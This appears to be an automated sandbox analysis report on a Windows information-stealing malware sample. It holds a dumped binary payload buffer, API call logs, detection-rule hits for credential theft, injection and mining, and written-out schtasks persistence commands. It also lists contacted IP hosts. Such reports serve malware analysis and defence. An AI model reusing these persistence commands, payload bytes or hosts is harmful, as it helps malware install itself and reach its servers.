buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELú °eà  ”!” @”@ €”@…¸ ”S@”è`”  H.text” ” `.rsrcè@””@@.reloc `” ”@Bð ”Hø ”À0(Çâ“0_~, (,( ~, (,( ~, (,( ~, (,( ~,~ èZ( ~,rprp( & 8Â~ o ~ o ~o ~o (~ , (~ rp( ,( rpo (+)~ r1p( ,( rpo (( ( (  (X ~ o ?.ÿÿÿ~&*0/s s s o Þ ,o Üo *  0(Ži  +‘Ži]‘aҜX Ži2ç*6((+*Ò*0c ( ~-þ s €~(+(+   + Ži]‘X‘X ÿ_ (X  2Ø*(! *0w{X ÿ_}{{{‘X ÿ_}{{{({{{‘{{‘X ÿ_‘aÒ*03s (}}}þs" (+*0‘ ‘œœ*0rKp(# s$ o% t*0ª(& o' rcp( ( (( -() o* (+ ,(, ,(- `(. ~/ (0 ~ o1 o2 o3  Þ/&Þ~4 (0 ~ o1 o2 o3 Þ& Þ* *R'y%|%¡%0\ €€€€€€€€r1p€ € rmp(5 € s6 rçpo7 rpo7 rpo7 rYpo7 repo7 € s6 rcpo7 rcpo7 rcpo7 rcpo7 rcpo7 € s6 rspo7 rspo7 rspo7 rspo7 rspo7 €s6 (8 o7 (8 o7 (8 o7 (8 o7 (8 o7 €*(! *"(9 *(! *0D s: o; o< rsp( ,o= &*r‰p( ,(( -o= &*(! *0Í r›ps> o? o@ +zoA rápoB oC oD rûp( ,!r'poB oC oE r3poF -) rCpoF -r'poB oC rQp( ,Þ4oG :zÿÿÿÞ ,o ÜÞ ,o ÜÞ ,o Ü**(Š¤  ²  ³¾ 0 rgp( (I ,**0  (J oK (&*06(L (M  ( (L (M Y j/ ÞÞ&Þ**//(! *Ãâ“ÎÊムlSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADPÅߎ–¸ì¤tHc¿I èÊ1E„Vuw@31839b57a4f11171d6abc8bbc4451ee4 FirstZ•3BInstallSetup7šáj rty25BG‹toolspub1G_ 3B5Zètm~dÍÿvÀfcx8wmzd2vxfcxxwmzd2v˜fmÂx´~ÍL¸{L©!fhsXpormXcno ernXi 'O+ oeC w @2vx/I[yZTyOYyF~ÿOyD/ÄHyU!òy\ÉFyA[y[yO6éyT4ÞAyZ4ÈOyX6iQhUyZfcxx'Em6aËb´dxfcx˜tfpd¸rvÀyfc—xwmzÐ$26xfcx}vmza3vxfÀòxxý/xd2fxfchxwmzt2vxfcŒù8_mz`%Âwxfcxx(5ý zd2vxfcxxwmzd2vxfK÷8`wmzd2vxfcxÐ8mzd2vxfcxxwmzJtWxx ·#xxw¸-zd2vxfcxXw`Craa2D2xfÐ#x4xw¼-zd2vxf#x@Vdt zX92v9fcxð8wmzd2v8fÀMtsxw  zdPsv xf"xxwmzdrvÀVrrxˆ^'m`;d3v9fcxxwm:d@2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzd2vxfcxxwmzdïDR¥DB ºó»Ì´Ì»Ì´D^çì:Ýj$Q“?cƒ¼»Ìˆ%mÐú›%6Ðö‡%nÐã‡%tÐ÷’%jÐäÍ%bÐø™%{Ðø‡%
request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0
section name: '' virtual_address: 0x00001000 virtual_size: 0x0010a000 size_of_data: 0x00072a00 entropy: 7.999628348377575 description A section with a high entropy has been found
section name: '' virtual_address: 0x0010b000 virtual_size: 0x00027000 size_of_data: 0x00011e00 entropy: 7.9949794414039665 description A section with a high entropy has been found
section name: '' virtual_address: 0x00132000 virtual_size: 0x00004000 size_of_data: 0x00000800 entropy: 7.31278394634321 description A section with a high entropy has been found
section name: .data virtual_address: 0x00445000 virtual_size: 0x0009e000 size_of_data: 0x0009d600 entropy: 7.939255201582201 description A section with a high entropy has been found
entropy 0.986411889597 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Match Windows Http API call rule Str_Win32_Http_API
description PWS Memory rule Generic_PWS_Memory_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Client_SW_User_Data_Stealer rule Client_SW_User_Data_Stealer
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description browser info stealer rule infoStealer_browser_Zero
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Perform crypto currency mining rule BitCoin
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
Time & API Arguments Status Return Repeated

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000478
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000480
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000480
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000484
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000484
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000484
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000484
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000484
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x0000047c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExA

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x80000002
key_handle: 0x00000470
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000580
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000580
key_handle: 0x00000588
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000580
key_handle: 0x00000588
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000580
key_handle: 0x00000588
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000580
key_handle: 0x00000588
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000580
key_handle: 0x00000588
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000580
key_handle: 0x00000594
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000580
key_handle: 0x00000594
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000580
key_handle: 0x00000598
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000580
key_handle: 0x00000598
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000580
key_handle: 0x00000598
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3012
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3012
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 604
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 604
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2856
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2856
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 1308
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 1308
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 1156
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 1156
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 884
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 884
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2932
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2932
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2568
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 2568
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3116
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3116
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3124
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3124
process_handle: 0x0000058c
1 0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3188
process_handle: 0x0000058c
0 0

NtTerminateProcess

status_code: 0xffffffff
process_identifier: 3188
process_handle: 0x0000058c
1 0 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
cmdline chcp 1251
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
wmi SELECT * FROM Win32_Processor
buffer Buffer with sha1: 64511468652f7e0aae2b13d653c159011fa2ec6a
buffer Buffer with sha1: 2441a44b06509975255deafbaa7fd57a83a0bd41
host 109.107.182.3
host 117.18.232.200
host 141.95.211.148
host 185.172.128.19
host 185.172.128.90
host 185.215.113.68
host 193.233.132.62
host 195.20.16.103
host 5.42.64.33
host 80.79.4.61
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d81000
process_handle: 0x0000000000000050
1 0 0

NtProtectVirtualMemory

process_identifier: 2980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d57000
process_handle: 0x0000000000000050
1 0 0

NtProtectVirtualMemory

process_identifier: 2580
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d81000
process_handle: 0x0000000000000050
1 0 0

NtProtectVirtualMemory

process_identifier: 2580
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d57000
process_handle: 0x0000000000000050
1 0 0

NtProtectVirtualMemory

process_identifier: 2964
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d81000
process_handle: 0x0000000000000050
1 0 0

NtProtectVirtualMemory

process_identifier: 2964
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d57000
process_handle: 0x0000000000000050
1 0 0

NtAllocateVirtualMemory

process_identifier: 4192
region_size: 532480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000029c
1 0 0

NtAllocateVirtualMemory

process_identifier: 5088
region_size: 335872
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
